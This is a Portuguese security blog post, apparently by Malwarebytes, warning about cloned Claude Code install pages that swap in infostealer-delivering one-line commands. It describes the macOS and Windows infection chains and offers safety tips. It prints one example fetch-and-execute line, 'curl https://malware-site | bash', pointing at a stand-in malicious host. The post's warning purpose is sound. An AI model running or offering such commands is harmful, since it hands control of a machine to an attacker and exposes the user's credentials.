Os invasores estão clonando páginas de instalação de ferramentas populares, como Claude Code, e substituindo os comandos de instalação de “uma linha” por malware, principalmente para roubar senhas, cookies, sessões e acesso a ambientes de desenvolvimento.
Os guias de instalação modernos geralmente orientam a copiar um único comando, como curl https://malware-site | bash no seu terminal e pressione Enter. Esse hábito transforma o site em um controle remoto: qualquer script que exista nesse URL é executado com suas permissões, geralmente as de um administrador.
Os pesquisadores descobriram que os invasores abusam desse fluxo de trabalho mantendo tudo idêntico, alterando apenas o local ao qual essa linha de código se conecta. Para muitos usuários não especialistas que acabaram de começar a usar IA e ferramentas de desenvolvimento, esse método parece normal, então eles baixam a guarda.
Mas isso basicamente se resume a “Eu confio neste domínio” e isso não é uma boa ideia, a menos que você tenha certeza de que ele é confiável.
Normalmente, acontece assim. Alguém pesquisa “Claude Code install” ou “Claude Code CLI”, vê um resultado patrocinado no topo com um URL plausível e clica sem pensar muito.
Mas esse anúncio leva a uma página de documentação ou download clonada: mesmo logotipo, mesma barra lateral, mesmo texto e um botão “copiar” familiar ao lado do comando de instalação. Em muitos casos, qualquer outro link em que você clica nessa página falsa redireciona você discretamente para o site real do fornecedor, de modo que nada mais parece suspeito.
Semelhante aos ataques ClickFix, esse método é chamado de InstallFix. O usuário executa o código que infecta sua própria máquina, sob falsos pretextos, e a carga útil geralmente é um infostealer.
A principal carga útil nesses casos do InstallFix com o tema Claude Code é um infostealer chamado Amatera. Ele se concentra em dados do navegador, como senhas salvas, cookies, tokens de sessão, dados de preenchimento automático e informações gerais do sistema que ajudam os invasores a criar um perfil do dispositivo. Com isso, eles podem sequestrar sessões da web e fazer login em painéis da nuvem e painéis administrativos internos sem precisar da sua senha real. Alguns relatórios também mencionam um interesse em carteiras criptográficas e outras contas de alto valor.
Windows Mac
A campanha baseada no Claude Code que os pesquisadores descobriram estava equipada para atingir Mac Windows Mac .
No macOS, o comando malicioso geralmente baixa um script de segundo estágio de um domínio controlado pelo invasor, muitas vezes ofuscado com base64 para parecer ruidoso, mas inofensivo à primeira vista. Esse script então baixa e executa um binário de outro domínio, removendo atributos e tornando-o executável antes de iniciá-lo.
No Windows, o comando foi visto gerando cmd.exe, que então chama mshta.exe com uma URL remota. Isso permite que a lógica do malware seja executada como um binário confiável da Microsoft, em vez de um executável aleatório óbvio. Em ambos os casos, nada de espetacular aparece na tela: você pensa que acabou de instalar uma ferramenta, enquanto a carga útil real começa silenciosamente a fazer seu trabalho em segundo plano.
Como se manter seguro
Com o ClickFix e o InstallFix em alta — e sem sinais de que irão desaparecer tão cedo —, é importante estar atento, ser cuidadoso e proteger-se.
- Vá com calma. Nãose apresse em seguir as instruções de uma página da web ou prompt, especialmente se elas pedirem para você executar comandos no seu dispositivo ou copiar e colar códigos. Analise o que o comando fará antes de executá-lo.
- Evite executar comandos ou scripts de fontes não confiáveis. Nuncaexecute códigos ou comandos copiados de sites, e-mails ou mensagens, a menos que confie na fonte e compreenda o objetivo da ação. Verifique as instruções de forma independente. Se um site solicitar que você execute um comando ou realize uma ação técnica, verifique a documentação oficial ou entre em contato com o suporte antes de prosseguir.
- Limite o uso de copiar e colar para comandos.Digitar manualmenteos comandos em vez de copiar e colar pode reduzir o risco de executar inadvertidamente cargas maliciosas ocultas no texto copiado.
- Proteja seus dispositivos. Useumasolução antimalwareatualizada e em tempo real com um componente de proteção da web.
- Informe-se sobre as técnicas de ataque em constante evolução.Compreender que os ataques podem vir de vetores inesperados e evoluir ajuda a manter a vigilância. Continue lendo nosso blog!
Dica profissional:você sabia que o Malwarebytes gratuito Malwarebytes Browser Guard avisa quando um site tenta copiar algo para a sua área de transferência?
Não nos limitamos a informar sobre as ameaças, nós as removemos
Os riscos de segurança cibernética nunca devem se espalhar além de uma manchete. Mantenha as ameaças longe de seus dispositivos fazendo o download Malwarebytes hoje mesmo.
